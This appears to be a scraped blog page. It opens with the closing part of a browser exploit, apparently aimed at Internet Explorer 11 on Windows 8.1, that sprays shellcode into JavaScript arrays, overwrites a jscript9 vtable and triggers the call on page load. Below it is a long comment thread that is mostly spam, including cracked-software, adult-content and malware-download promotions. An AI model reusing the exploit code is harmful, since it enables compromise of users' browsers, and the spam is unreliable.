 arrarr[arrindex][eaxoffset + 14] = addrlo + 24 + eaxoffset*4 + 50*4;
 arrarr[arrindex][eaxoffset + 15] = addrhi;

 //encode the shellcode
 for(var i=0;i<Math.floor(shellcode.length/4);i++) {
    arrarr[arrindex][eaxoffset + 50 + i] = u2s(shellcode[i*4+3]*0x1000000 + shellcode[i*4+2]*0x10000 + shellcode[i*4+1]*0x100 + shellcode[i*4]);
 }

 //overwrite a vtable of jscript9 object and trigger a virtual call
 arrarr[arrindex][7] = addrhi;
 arrarr[arrindex][6] = addrlo + 24 + eaxoffset*4;
 //arrarr[arrindex][7] = 0x123456;
 //arrarr[arrindex][6] = 0x123456;

 //alert("done3");
 arrarr[arrindex+1].blah();
}

function run() {
 numsploits = 0;
 window.setTimeout(spray, 1000);
}

</script>
<body onload=run()>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
<form><table><th><ins>aaaaaaaaaa aaaaaaaaaa</ins></th></table></form>
</body>

360 comments:

«Oldest   ‹Older   201 – 360 of 360
Rajesh said...

ice infromation
Selenium Training In Chennai
Selenium course in chennai
Selenium Training
Selenium Training institute In Chennai
Best Selenium Training in chennai
Selenium Training In Chennai

Rpa Training in Chennai
Rpa Course in Chennai
Rpa training institute in Chennai
Best Rpa Course in Chennai
uipath Training in Chennai
Blue prism training in Chennai

Training for IT and Software Courses said...

I am Here to Get Learn Good Stuff About pytho Training, Thanks For Sharing pythonTraining.python training in bangalore

Rj Shiyam said...

Nice information, valuable and excellent design, as share good stuff with good ideas and concepts, lots of great information and inspiration, both of which I need, thanks to offer such a helpful information here.
Are You looking for best online courses and free webniars you just click following links
Online Certificate Courses
Machine Learning Online Courses
Best Online Certificate Courses In India
Online Courses On Digital Marketing
Online It Courses In India

Unknown said...

The most important thing in manual removal of AntiVirus Demo is to end all the related processes and then you can move to the following steps.see more
see more

know more

Unknown said...

see more
see more

Downling said...

Miracle Box 2020 Keygen is a really helpful software tool that is worked for flashing your mobile phones. Flashing of mobile is a process for installing OS in Mobile or Tablet.Download and install Miracle box latest setup on your Windows PC. Flashing of a mobile phone would be breathtaking for you, especially for the beginners who do not know even now the basics of flashing of the mobile phone.The reason why do you need to update the firmware of your mobile phone or why you want to flash your phone is quite evident. If you are finding that your phone is not working fin, or not working smooth, your phone’s camera suddenly starts flashing.

Soft Online Training said...

Nice Blog with Good Information
Soft Online gives best training for Oracle Fusion and EBS Courses
Oracle Fusion SCM Training
Oracle Fusion HCM Training
Oracle Fusion Financials Training
For more info Visit us: www.softonlinetraining.com

Training for IT and Software Courses said...

Excellent information with unique content and it is very useful to know about the Devops.devops training in bangalore

Training for IT and Software Courses said...

Linking is very useful thing.you have really helped lots of people who visit blog and provide them use full information.devops Training in Bangalore

Simpledog said...

Discover the fabulous highlights of Baku on our Baku city tour
. Starting in Baku, you will explore the awe-inspiring architectural and cultural legacy of this capital. Explore Baku Old City, the Shirvanshahs’ Palace and the Maiden Tower. During the Full Day Baku Tour, you will visit different parts of the city belonging various periods of the history of Baku starting from middle ages to the modern era.

Gobustan National Park is one of Azerbaijan’s most popular sights that attracts thousands of tourists annually. Explore Gobustan, ancient petroglyphs and mud volcanoes in a 4-hour tour with a Gobustan Tour . It is just amazing places you hae to visit
.

You will visit the area of the Absheron Peninsula and amazing historical and natural sights. Absheron Peninsula tour
covers three historical places. You will get an opportunity to become acquainted with old household and ethnographic traditions at Gala open-air museum.

Simpledog said...


Absheron tour
covers three hiExplore Gobustan museum, ancient petroglyphs and mud volcanoes in 4-hour tour with Gobustan tour
Gobustan National Park, included in the UNESCO World Heritage Sites list, is one of Azerbaijan’s most popular sights attracting thousands of tourists annually.storical places. You will get an opportunity to become acquainted with old household and ethnographic traditions at Gala open-air museum. During the tour you will see Quadranqular Tower, one of the ancient Absheron towers located in Mardakan village. Moreover, you will also learn legends about Burning Mountain and the streams located nearby.

A favorite resting place of the Baku residents and capital guests is Boulevard (seafront). From the boulevard you can also make a real sea-voyage by pleasure-boat along the Baku Bay. During such Baku Boat tour
a guide will put up the tourists with interesting facts and legends from the Caspian Sea history.


Start exploring Baku with Icherisheher tour
. Icheri Sheher is the heart of the city, has a history of thousands of years and is located in the historic centre of ancient Baku. Icherisheher is the pearl of Azerbaijani architecture and culture and many significant restoration works have been undertaken within recent years

Simpledog said...

Əgər sizdə elan qoymaq istəsəz Ev elanlari veb saytından istifadə edə bilərsiniz
Her bir aile gec tez ozune ev almaq və ya ev alqi satqisi ve ya evini satmaq isteyir.
Bizim saytımızda həmçinin çoxlu kiraye ucuz evler var.

Simpledog said...


An Azerbaijan eVisa
is an official document which provides authorization to travel to and from Azerbaijan.Citizens from over 80 countries can apply for Azerbaijan e-visa.

There are more than 80 Countries eligible for azerbaijan visa
and they can apply for an e-Visa through the ASAN Visa system and can get the Azerbaijan e-Visa.

Getting an azerbaijan visa for uae resident
is easier . If you are a UAE resident, you can apply for a visa from the comfort of your home and get your visa.UAE residents will now be able to obtain a tourist visa on arrival in Azerbaijan.


Applicants from the UK need to follow a few basic steps to get a visa to Azerbaijan.It is so simply get azerbaijan visa for united kingdom citizens

Simpledog said...

Bizim şirkətdə adətən aşağıdakı Seo xidmeti ile bagli verilen suallar

Shubhesiz ki,, Seo xidməti
Haqqinda eshitmisiz. SEO Search engine optimization sozunden goturulub ve axtarish sistemlerine gore saytlarin optimizasiyasi gedir.

Eger sizin vebsaytiniz yenidirsen o zaman Kontekst reklam sizin uchun en ideal sechimdir. Kontekst reklam ile sizin satishlariniz suretlenecek

Simpledog said...

Search Engine Optimization (SEO xidmeti) – İnternet-layihelerin axtarıs sistemlerinde, xususile GOOGLE-da one çekilməsi uzre pesekar fealiyyət demekdir.Saytların yıgılması prosesi basa çatdıqdan sonra SEO xidmeti
veb sayt üçün en önəmli faktorlardan biridir.


Axtarıs sistemlerində optimizasiya (SEO – Search Engine Optimization) saytınızın reytinqinin Google, Yandex, Bing kimi axtarıs sistemlerinde artırılması fealiyyətidir. SEO xidməti
zamanı kampaniyanızın en basından secilmis diqqətli SEO hedefleme gelecekde daha boyuk ugurlar elde etmeyinize sebeb olacaqdır.


Sosial media marketinq günümüzün ve geleceyin en effektiv reklam modellerindən biridir. Bu sebebdendir ki, SMM xidməti
dünyanın tanınmıs brendleri terefinden xususi diqqet merkezinde saxlanılır.

Simpledog said...


Absheron tour
covers three hiExplore Gobustan museum, ancient petroglyphs and mud volcanoes in 4-hour tour with Gobustan tour
Gobustan National Park, included in the UNESCO World Heritage Sites list, is one of Azerbaijan’s most popular sights attracting thousands of tourists annually.storical places. You will get an opportunity to become acquainted with old household and ethnographic traditions at Gala open-air museum. During the tour you will see Quadranqular Tower, one of the ancient Absheron towers located in Mardakan village. Moreover, you will also learn legends about Burning Mountain and the streams located nearby.

A favorite resting place of the Baku residents and capital guests is Boulevard (seafront). From the boulevard you can also make a real sea-voyage by pleasure-boat along the Baku Bay. During such Baku Boat tour
a guide will put up the tourists with interesting facts and legends from the Caspian Sea history.


Start exploring Baku with Icherisheher tour
. Icheri Sheher is the heart of the city, has a history of thousands of years and is located in the historic centre of ancient Baku. Icherisheher is the pearl of Azerbaijani architecture and culture and many significant restoration works have been undertaken within recent years

Simpledog said...

Discover the fabulous highlights of Baku on our Baku city tour
. Starting in Baku, you will explore the awe-inspiring architectural and cultural legacy of this capital. Explore Baku Old City, the Shirvanshahs’ Palace and the Maiden Tower. During the Full Day Baku Tour, you will visit different parts of the city belonging various periods of the history of Baku starting from middle ages to the modern era.

Gobustan National Park is one of Azerbaijan’s most popular sights that attracts thousands of tourists annually. Explore Gobustan, ancient petroglyphs and mud volcanoes in a 4-hour tour with a Gobustan Tour . It is just amazing places you hae to visit
.

You will visit the area of the Absheron Peninsula and amazing historical and natural sights. Absheron Peninsula tour
covers three historical places. You will get an opportunity to become acquainted with old household and ethnographic traditions at Gala open-air museum.

John Richards said...

Read More
Read More
Read More
Read More
Read More

Desinelabs said...

Its great and knowledgeable post. Thanks...
angularjs training in bangalore - AngularJS Training in Bangalore - Learn AngularJS 6 from Expert Real-time Trainers
at i Digital Academy with Live Projects and Placement Assistance. Book a Free Demo Today.
https://www.idigitalacademy.com/angularjs-training-in-bangalore/

Annetta R. Richmond said...

Upgraded from Football Manager 14 to Football Manager 2020 Crack is a very poor iteration of the game. You seemingly have to have the tactical nous of Jose Mourinho, budget of the Real Madrid Galaticos and squad of Lionel Messi’s to muster a 5-5 draw at home against Bognor Regis. The graphics are good in comparison to previous versions of the FM series and should be applauded, even if it is going the way of less is more.

The Football Manager 2020 Crack itself has become too involved in its own self-gratification and you sincerely get the sense that the programmers decided it would be best if we all got shafted every time we even thought about loading the game up. You’re punished for even the most minor of tactical errors and despite numerous sessions of trying to ‘figure it out’ you’re chewed up, spat out and then dumped on for good measure. Never has a game made me feel more idiotic and suicidal than this one. This game has single-handedly destroyed my love for anything football and I won’t be parting with another penny every again. Shame on you SI Games, you shouldn’t use the games name as you don’t produce anything of the sort.

Desinelabs said...

Thanks for sharing this information and keep updating us...
python training in bangalore - eCare Technologies located in Marathahalli - Bangalore, is one of the best Python Training institute with 100% Placement support. Python Training in Bangalore provided by Python
Certified Experts and real-time Working Professionals with handful years of experience in real time Python Projects.
http://www.ecaretechnologies.info/Python-Training-Institutes-in-Bangalore.html

Geraldine Garcia said...

It is worthwhile to note here that Black Friday comes after Thanksgiving Day, and this is the time all the retailers offer attractive deals across the globe.If you have a high-traffic website, you should opt for a dedicated server over shared servers which are quite common these days. Black Friday Dedicated Server Deals 2019 is the appropriate occasion for you to avail of a good discount.

vijay said...

Thanks for your valuable post... The data which you have shared is more informative for us...
aws Training in Bangalore
python Training in Bangalore
hadoop Training in Bangalore
angular js Training in Bangalore
bigdata analytics Training in Bangalore

TNK Design Desk said...

Thank you so much for these kinds of informative blogs.
we also providesseo services
graphic designing company in gurgaon
website company in gurgaon
best website designing company in india
top website designing company in india
website designing company in gurgaon
website development company in gurgaon
web development company in gurgaon
best website designing company in gurgaon
website designing services in gurgaon
web design company in gurgaon
website company in gurgaon
Website design Company in gurgaon
website designing in gurgaon
website designing company in gurgaon
website design in gurgaon
website design company in gurgaon
website design services in gurgaon
website design service in gurgaon
website designing in gurgaon
web design services in gurgaon
best website design company in gurgaon
best web design company in gurgaon
best website design in gurgaon
best website design services in gurgaon
best website designing services in gurgaon
best web design in gurgaon
best web design company in gurgaon
best web designing services in gurgaon
best web design services in gurgaon

Radhika said...

Thanks for sharing this fantastic blog, really very informative. Your writing skill is very good, you must keep writing this type of blogs

Home Salon Dubai
wedding car hire gurgaon
wedding car hire banglore wedding car hire delhi
wedding car hire dehradun
wedding car hire noida

Radhika said...

Thanks for sharing this fantastic blog, really very informative. Your writing skill is very good, you must keep writing this type of blogs

Home Salon Dubai
wedding car hire gurgaon
wedding car hire banglore wedding car hire delhi
wedding car hire dehradun
wedding car hire noida

Home Salon in mumbai

Kanye Co Jamila said...

Great Article
Data Mining Projects


Python Training in Chennai

Project Centers in Chennai

Python Training in Chennai

test said...

Xforce keygen is the stunning software program that can activate your AutoCAD software. AutoCAD is a simplified graphical software that lets the user create maps and architectural projects. For sure these types of software programs are not for free, so for getting it, the user has to first download the setup file from the official website. For the very first time, you can get the trial version later on user must have to purchase activation key for lifetime activation. With this program, you can get a complete solution to activate the trial version of AutoCAD software without paying zero money. For sure, it is created by expert coder who experiences many years in creating hacks, cracks, and keygen for various type of multiplayer and online games. However, it is 100% fully working to activate and update your compatible with latest Windows PC completely.
https://www.tingoc.com/xforce-2020-full-crack/
Xforce crack was first created by illustrator Rob lie field after he started penciling the New Mutants. For accomplishing this particular program, it provides numerous tools implemented we have got the technologies. To achieve this software program, it offers many tools implemented we have got the technology to boost performance. Due to its free download, all the process provides the virtual key that does not need any further purchase of the product to activate the software entirely.
https://tingosoft.com/xforce-2020-full-crack/

kumar vihaan said...

Singh TomNarendra Singh Tomar (born 12 June 1957) is an Indian politician and a member of the 17th Lok Sabha. He is the Minister of Agriculture & Farmers Welfare and Minister of Rural Development in the Second Modi ministry. Previously he was the Minister of Mines and Minister of Parliamentary Affair in the Government of India. He is a leader of Bharatiya Janata Party and was a member of Sixteenth Lok Sabha from 2014 to 2019[1] from Gwalior (Lok Sabha constituency). In 2019, he changed his constituency and was re-elected to Lok Sabha from Morena.

ar (born 12 June 1957) is an Indian politician and a member of the 17th Lok Sabha. He is the Minister of Agriculture & Farmers Welfare and Minister of Rural Development in the Second Modi ministry. Previously he was the Minister of Mines and Minister of Parliamentary Affair in the Government of India. He is a leader of Bharatiya Janata Party and was a member of Sixteenth Lok Sabha from 2014 to 2019[1] from Gwalior (Lok Sabha constituency). In 2019, he changed his constituency and was re-elected to Lok Sabha from Morena.

Reshma said...

Thanks for this wonderful blog it is really informative to all.keep update more information about this
Selenium Training in Chennai
Selenium Training in Bangalore
Selenium Training in Coimbatore
Selenium Training Institute in Chennai
Best Selenium Training in Bangalore
Best Selenium Training in Coimbatore
Ethical Hacking Course in Bangalore
Tally Course in Chennai

Realtime Experts said...

Thanks for sharing this blog. This very important and informative blog

sap basis training in bangalore

sap mm training in bangalore

sap hana training in bangalore

sap fico training in bangalore

sap abap training in bangalore

Bangalore Training Academy said...

Enjoyed reading the article above, really explains everything in detail, the article is very interesting and effective. Thank you and good luck…

Hadoop Training in Bangalore
Hadoop Courses in Bangalore
Hadoop Classes in Bangalore
Hadoop Training Institute in Bangalore
Hadoop Course Syllabus
Best Hadoop Training
Hadoop Training Centers

sohbetsec said...

Gabile Mobil Avrupa sohbet hizmetleri getirmektedir ve bölge arayan sizlerle tanısarak bölge olmayı beklemekteler. Bu gün siz degerli kullanıcılarımıza ve osmaniye halkına yaptığımız işleri tanıtacagız dünyanın her yerinden meselesiz olarak fiyatsız üyeliksiz olarak mobil sohbet girişlerimiz ve internet girişlerimizi kullanarak odalarımıza katılabilir site içinde tespit edilen radyo odamızdaki işlek yayınlarımızı keyfle dinleyerek oyun odalarımızda arkadaslarınızla beraber yarıoşarak zamanınızı eglenceli duruma getirebilirsiniz. Gabile Mobil sohbet Odaları Karadeniz sohbet

python training in vijayawada said...

We as a team of real-time industrial experience with a lot of knowledge in developing applications in python programming (7+ years) will ensure that we will deliver our best in python training in vijayawada. , and we believe that no one matches us in this context.

Vihaan Kumar said...

I Vihaan Kumar, I am a forestry photographer and my passion book reading to gain knowledge of other places.
Belize is resting in peace between Guatemala and Mexico and is a unique vacation spot for the formidable traveler – Vihaan Kumar who desires to find out the Caribbean way of life in its entirety.

Training for IT and Software Courses said...

Very useful and information content has been shared out here, Thanks for sharing it.

cloud computing training in bangalore

cloud computing courses in bangalore

cloud computing classes in bangalore

cloud computing training institute in bangalore

cloud computing course syllabus

best cloud computing training

cloud computing training centers

i Digital Academy said...

Thanks for such a valuable information...
SEO Training in Bangalore | SEO Course Fees | Best SEO Classes - Join SEO Training in Bangalore at i Digital Academy and learn how to increase your website Traffic by
Google Certified Trainers with 100% Placements and affordable course fees. Book a Free Demo!

Jack sparrow said...

Thank you for sharing such a great information.Its really nice and informative.hope more posts from you. I also want to share some information recently i have gone through and i had find the one of the best mule esb training videos

Babit said...

Thanks for sharing this info. I just want to let you know that I just check out your site and I find it very interesting and informative.
AngularJS Training in Pune
RPA Training in Pune
Devops Training in Pune

i Digital Academy said...

Thank you for sharing this unique useful information content with us...
AngularJS Training in Bangalore | AngularJS Course Fees | AngularJS 6 - i Digital Academy
- AngularJS Training in Bangalore - Learn AngularJS 6 from Expert Real-time Trainers at i Digital Academy with Live Projects and Placement Assistance. Book a Free Demo Today.

Kumar Vihaan Body Builder Trainer said...

The IPS (Manoj Malviya) submit provides immense strength to the officer especially some non-mentioned powers to keep order in the society in the time of crisis. Here, we are offering a distinct account of the powers and responsibilities of the Manoj Malviya officer.

Rajesh Anbu said...

Thanks for sharing this pretty post, it was good and helpful. Share more like this.
aws Training in Bangalore
python Training in Bangalore
hadoop Training in Bangalore
angular js Training in Bangalore
bigdata analytics Training in Bangalore
python Training in Bangalore
aws Training in Bangalore

Anonymous said...

https://myhrcvs.page.tl/About-CVS-Health.htm
https://telegra.ph/At-the-Pharmacy-Counter-12-16
https://all4webs.com/cvsmyhr/home.htm?42297=29815
https://medium.com/@inboxtomytr/utilizing-pharmacy-benefit-management-solutions-d146636343ae
https://cvsslogin.blogspot.com/2019/12/cvs-login-phar.html
customer plan individuals to fill their upkeep remedies through mail request conveyance or at a CVS Pharmacy retail location at a similar cost


Apextrainings said...

Good Blog. Thanks for sharing it.
digital marketing institute in Hyderabad
python training in Hyderabad
Aws online training

Angular expert said...


I couldn’t resist commenting. Exceptionally well written!


Selenium Courses in Marathahalli

selenium institutes in Marathahalli

selenium training in Bangalore

Selenium Courses in Bangalore

best selenium training institute in Bangalore

selenium training institute in Bangalore

web design company said...

thanks for your information.it's really nice blog thanks for it.keep blogging.
web design company in nagercoil
website design company in nagercoil
web development company in nagercoil
website development company in nagercoil
web designing company in nagercoil
website designing company in nagercoil
digital marketing company in nagercoil
digital marketing service in nagercoil

Vishnu said...

Great Post..
AWS Training in Chennai
Best AWS Training in Chennai

Vishnu said...

Wonderful Post..
SAP Training in Chennai
SAP ABAP Training in Chennai
SAP Basis Training in Chennai
SAP FICO Training in Chennai
SAP MM Training in Chennai
SAP PM Training in Chennai
SAP PP Training in Chennai
SAP SD Training in Chennai
SAP SRM Training in Chennai
SAP Success Factors Training in Chennai

Vishnu said...

Informative Post...
Hardware and Networking Training in Chennai
CCNA Training in Chennai
AWS Training in Chennai
SAP Training in Chennai
Software Testing Training in Chennai
Java Training in Chennai
QTP Training in Chennai
iOS Training in Chennai
Oracle Training in Chennai
Pearson Vue Exam Center in Chennai

svrtechnologies said...

Pretty article! I found some useful information in your blog, it was awesome to read, thanks for sharing this great content to my vision, keep sharing. msbi training videos and sql server online course.

Anonymous said...

http://cvslogin.bravesites.com/
http://myhrcvss.yolasite.com/
http://cvvsmyhr.emyspot.com/
http://mycvvshr.simplesite.com
https://myhrrcvs.page.tl/CVS-Pharmacy.htm
customer plan individuals to fill their upkeep remedies through mail request conveyance or at a CVS Pharmacy retail location at a similar cost

Anonymous said...


Thanks for Sharing This Article.It is very so much valuable content. I hope these Commenting lists will help to my website
workday studio training

harsh860 said...

Great article by author.It provide some crucial insights.Home Tuition in Ranchi is also provided by Trustudies- The Complete Home Tuition Solution

IT Tutorials said...

Thanks for the article. Its very useful. Keep sharing.   aws training in chennai  |     best aws training institute in chennai     aws certification exam centers in chennai   

high technologies solutions said...


Great information and very useful content
Python training course in Delhi
python training institute in noida

TIB ACADEMY said...

Thanks for sharing the useful information...
Python Training in Bangalore
AWS Training in Bangalore
Data science with python training in bangalore
Machine Learning Training in Bangalore
Machine Learning with Python Training in Bangalore
UI Development Training in Bangalore

Elegant IT Services said...

Nice Post...Thanks for sharing the Article...
angularjs training in bangalore

Nandhini said...

Thanks for sharing like a wonderful blog’s learn more new information from your blog. Keep sharing the post like this…
Data Science with Python Training in BTM
UI and UX Training in BTM
Angular training in BTM
Web designing Training in BTM
Digital Marketing Training in BTM

priyanka said...

data analytics course

priyanka said...

data analytics course

renshiya said...
This comment has been removed by the author.
RIA Institute of Technology said...

Nice post. Thanks for sharing...
Devops Course in Bangalore

high technologies solutions said...

Thanks for posting. Very useful content shared by you
java training course in Delhi
java training course in Noida

Elegant IT Services said...

Thanks for sharing this information and keep updating us...
Python Training in Bangalore

high technologies solutions said...

very informative post shared by you. Thanks for sharing
Digital Marketing course in Delhi
Digital Marketing course in Noida

Techiesys said...

Outstanding information.

Web Design Company in Bangalore

Shivani said...

Very good information. Lucky me I ran across your site by accident (stumbleupon). I have saved it for later!

Advanced Java Training Center In Bangalore

selenium training in Bangalore

Selenium Courses in Bangalore

best selenium training institute in Bangalore

selenium training institute in Bangalore

Shivani said...

This website was... how do you say it? Relevant!! Finally I have found something which helped me. Thank you!

Advanced Java Training Center In Bangalore

selenium training in Bangalore

Selenium Courses in Bangalore

best selenium training institute in Bangalore

selenium training institute in Bangalore

Elegant IT Services said...

Nice Blog...Thanks for Sharing the Information...
Elegant IT Services

IICT Technologies said...

Superb
SAP Training in Chennai
SAP ABAP Training in Chennai
SAP Basis Training in Chennai
SAP FICO Training in Chennai
SAP SD Training in Chennai
SAP MM Training in Chennai
SAP PM Training in Chennai
SAP PP Training in Chennai
SAP MDG Training in Chennai
SAP EHS Training in Chennai

RIA Institute of Technology said...

Thanks for sharing this information with us...
Python Training in Bangalore

RIA Institute of Technology said...

Thanks for sharing such a nice information with us...
angular js training in bangalore

kahuja said...

Wonderful blog! thanks for sharing such wonderful blog with us ,after long time came across such knowlegable blog. keep sharing such informative article with us.
Python classes in Pune

Anonymous said...

Thanks for Sharing This Article.It is very so much valuable content. I hope these Commenting lists will help to my website
welcome to akilmanati
akilmanati

Skit Corporate said...

Outstanding information for Exploiting Internet Explorer 11 64-bit on Windows 8.1 Preview, Continue updating technology information with the latest updates. For further updates & services visit: website development company in Chennai | seo company in Chennai

theCheapways.com said...

Thanks for all the tips mentioned in this article! it’s always good to read things you have heard before and are implementing, but from a different perspective, always pick up some extra bits of information very nice… i really like your blog…CheapWays Digital marketing company

Pravin Patel said...

Find all latest government jobs at Maharojgar

Get All Government Jobs / Sarkari Naukri recruitment Notifications Here for Freshers and Experienced. Qualification 10th, 12th, ANY DEGREE, PG, BTech, MBA. State Government Jobs in India with state and local governments including city, county, and state public agencies. Apply now.

Keerthana said...

Excellent Blogs, The writing style of the Posts are really quite Good . simple explanation about Python Training with placements are here below
python training in chennai | python training in annanagar | python training in omr | python training in porur | python training in tambaram | python training in velachery

latchu kannan said...

i really like to thank you for this

BEST ANGULAR JS TRAINING IN CHENNAI WITH PLACEMENT

https://www.acte.in/angular-js-training-in-chennai
https://www.acte.in/angular-js-training-in-annanagar
https://www.acte.in/angular-js-training-in-omr
https://www.acte.in/angular-js-training-in-porur
https://www.acte.in/angular-js-training-in-tambaram
https://www.acte.in/angular-js-training-in-velachery

Indhu said...

thanks for sharing this informations.
python training institute in coimbatore
python course in coimbatore
Software Testing Course in Coimbatore
Java training in coimbatore
artificial intelligence training in coimbatore
C and C++ training in coimbatore
android training institutes in coimbatore

John Mooler said...

ice blog, it's so knowledgeable, informative, and good-looking site. myassignmenthelpau is a great platform that has been performing astonishingly well. If yes, then you are on the right platform to receive the best top female names.

nizam said...

wow...amazing..These ways are very simple and very much useful, as a beginner level these helped me a lot thanks fore sharing these kinds of useful and knowledgeable information.

AngularJS training in chennai | AngularJS training in anna nagar | AngularJS training in omr | AngularJS training in porur | AngularJS training in tambaram | AngularJS training in velachery


Indhu said...

Thanks for sharing this blog
python training institute in coimbatore

python course in coimbatore

android training institutes in coimbatore

amazon web services training in coimbatore

Java training in coimbatore

artificial intelligence training in coimbatore

I am HEro said...
This comment has been removed by the author.
Adult Webcam Entertainment said...

https://weplinis.typeform.com/to/F5AYjr
https://telegra.ph/Sex-Cams-Xvideos-XNXX-Xhamster-Chaturbate-Shemales-04-07
https://docs.google.com/file/d/1WL2JR4xwxcqS_ykT3mIfYhjJcNsN4wKr/edit
https://www.blogger.com/profile/03222161580802111908
https://blede.soup.io/

Adult Webcam Entertainment said...

There's a basic remedy to this: correspondence. On the off chance that you can start to discuss naked hotfallingdevil porn and bring it out of the shadows, the clumsiness, humiliation, and torment frequently start to disperse.

This additionally unavoidably opens up porn littlesubgirl show of more noteworthy genuineness, which thusly can cultivate more prominent closeness. All things considered, perhaps we have a few "privileged insights," as well.

Like, for example, uh, huge numbers of us jerk off on nude naughtyelle cam , which is obviously absolutely sound, but then we may not discuss it with our accomplices. When we can diffuse these kind of untouchable subjects, we as a whole vibe less alone—our accomplices, just as us.

The main concern is: If it pesters you, it should be tended to. All things considered, it might likewise be useful to recall that men who don't once in a while stroke off with sexy siswet19 show entertainment, are presumably the exemption, not the standard.

I don't have my significant other's mastery as a holistic mentor, however I do have a naked anabel054 porno , and state with absolute certainty (and from individual experience), that she's privilege here.

I'm not catching this' meaning? As I would like to think, not all that much. I can positively mention to you what it for the most part doesn't mean. Watching nude migurtt erotic is commonly a type of pressure discharge, and we'd decide to engage in relations with you over it.

TripleoneGk said...

hey if u looking best Current affair in hindi but before that what is current affair ? any thing that is coming about in earth political events. things that act on the meeting, if need this visit our website and get best Current affair in hindi

Mickey. said...

Nice article!!! Keep Blogging!!! Thank you for sharing such a wonderful article!!

https://devu.in/machine-learning-training-in-bangalore/

svrtechnologies said...



Wow. That is so elegant and logical and clearly explained. Brilliantly goes through what could be a complex process and makes it obvious.I want to refer about the best msbi training in bangalore

Unknown said...

Good Post! , it was so good to read and useful to improve my knowledge as an updated one, keep blogging.After seeing your article I want to say that also a well-written article with some very good information which is very useful for the readers....thanks for sharing it and do share more posts like this.
https://www.3ritechnologies.com/course/microsoft-azure-training-in-pune/

Anonymous said...
This comment has been removed by the author.
Anonymous said...
This comment has been removed by the author.
hyder31 said...

Nice Blog

New Mehndi designs

svrtechnologies said...


I am have been reading this post from the beginning,it has been helping to Gain some knowledge & i feel thanks to you for posting such a good blog, keep updates regularly.i want to share about datapower tutorial .

Tutorials said...

Thanks for the article. Its very useful. Keep sharing.   Big Data course online  |     Hadoop training in chennai   Bigdata Hadoop training in chennai  

Anirban Ghosh said...

The content is well recognized, so no one could claim that it is just one person's opinion yet it covers and justifies all the valid points. Hope to read some more work from you.

SAP training in Kolkata
SAP training Kolkata
Best SAP training in Kolkata
SAP course in Kolkata

Tutorials said...

Thanks for the article. Its very useful. Keep sharing.   Devops course online |     Devops training in chennai   Devops training in chennai, omr  

svrtechnologies said...


Firstly talking about the Blog it is providing the great information providing by you . Thanks for that .Hope More articles from you . Next i want to share some Information about Salesforce training in Hyderabad .

Fuel Digi said...

We are the Best Digital Marketing Agency in Chennai.Our team consists of very best of programmers,web developers,SEO experts and many others. we offer all digital marketing service at affordable cost.
Thanks for the article…
Best Pay Per Click Service in Chennai
Best Quality Content Marketing Team in Chennai
ECommerce website development company in Chennai

Pushba said...

Good one, very informative.. thanks for sharing your views and ideas.. it is very useful to me.. thanks once again..

IELTS Coaching in chennai

German Classes in Chennai

GRE Coaching Classes in Chennai

TOEFL Coaching in Chennai

Spoken english classes in chennai | Communication training

kirankumarpaita said...

software testing company in India
software testing company in Hyderabad
Thanks for sharing such an awesome blog with us.
Really useful information.
keep sharing.

KP Webtech said...



Wordpress Development Company in Chennai

KP Webtech, among the top WordPress development companies in Chennai, has competent developers in the WordPress domain who can capably bend the software to deliver inspiring custom corporate websites, CMS solutions, and e-commerce portals...
Wordpress has for long been a favourite among programmers due to its multiple possibilities and availability of numerous plugins. Statistics show that over 60 million people (and growing) use Wordpress for website development.
As the best Wordpress development company in Chennai, KP Webtech empowers you with agile and scalable solutions to satisfy all your needs right from content management to marketing with our Wordpress solutions. Secure, user-centric, elegant and scalable, Wordpress ticks all the boxes to be the platform of choice for web development. While the Wordpress website development cost in Chennai is variable, we can offer flexible packages to suit your needs and ensure absolute satisfaction at every step.

saketh321 said...

Really nice and interesting post. I was looking for this kind of information and enjoyed reading this one. ExcelR Data Analyst Course

Unknown said...

Truly, this article is really one of the very best in the history of articles. I am a antique ’Article’ collector and I sometimes read some new articles if I find them interesting. And I found this one pretty fascinating and it should go into my collection. Very good work!Business Analytics Courses

Unknown said...

More informative,thanks for sharing with us. fue turkey

AnnaSereno said...

Hey! Good blog. I was facing an error in my QuickBooks software, so I called QuickBooks Customer Support (877)948-5867. I was tended to by an experienced and friendly technician who helped me to get rid of that annoying issue in the least possible time.

Anonymous said...

ExcelR provides Business Analytics Course. It is a great platform for those who want to learn and become a Business Analytics Courses. Students are tutored by professionals who have a degree in a particular topic. It is a great opportunity to learn and grow.

Business Analytics Courses

Amirtt said...

Nice information. Thanks for sharing content and such nice information for me. I hope you will share some more content about. Please keep sharing!
For More: Tensile Fabric Structure in Chennai
Tensile Membrane Structure Manufacturers in Chennai
Car Parking Shed Manufacturers in Chennai
Window Blinds Manufacturers in Chennai

viewspk said...


learn all kind of hacking in free
https://blankhack.com/

download crypter in free
https://blankhack.com/category/cryptersfree-fud-crypterscrypters-fudcrypters-crackedcrypters-free-downloadcrypters-100-fudcrypters-fud-free-downloadfree-crypters-for-life-timesilent-crypters-fudfree-silent-crypterscrypter/

download free exploit pack
https://blankhack.com/category/exploitdorkexploitloopholeexploit-dbgeekvulnerableexploit-databaseto-exploitdorks-2016exploit-malwaredorks-booksexploit-virusa-dorknerd-geek-dorkword-exploitdork-sqlzero-day-exploitc/

download viruses in free

https://blankhack.com/category/computer-virustypes-of-computer-virustrojan-virusinternet-viruslatest-computer-virustrojan-horse-virusmalware-viruslatest-viruslist-of-computer-virusesvirus-onlinenew-computer-virusmalicio/

download proxy tools in free
https://blankhack.com/category/vpnproxy-toolsocksvpn-servicebest-vpnboot-socksmens-socksvirtual-private-networksocks-onlinecool-socksvpn-proxyvpn-privatevpn-onlinebest-vpn-servicevpn-tunnelvpn-networkvpn-for-window/

download cracked software in free

https://blankhack.com/category/softwarefull-softwarecracked-software-sitesfull-pc-softwaresoftware-download-sites-for-pc-free-full-versionused-software-licensessoftware-download-free-fullfree-software-licensebest-site-for/

download psd template in free
https://blankhack.com/category/psd-templatespsdphotoshop-templatespsd-filepsd-photoshoppsd-website-templatespsd-designdrving-licence-templatephotoshop-templatespsd-photoshopbusiness-card-templatebusiness-card-designfre/

download script in free
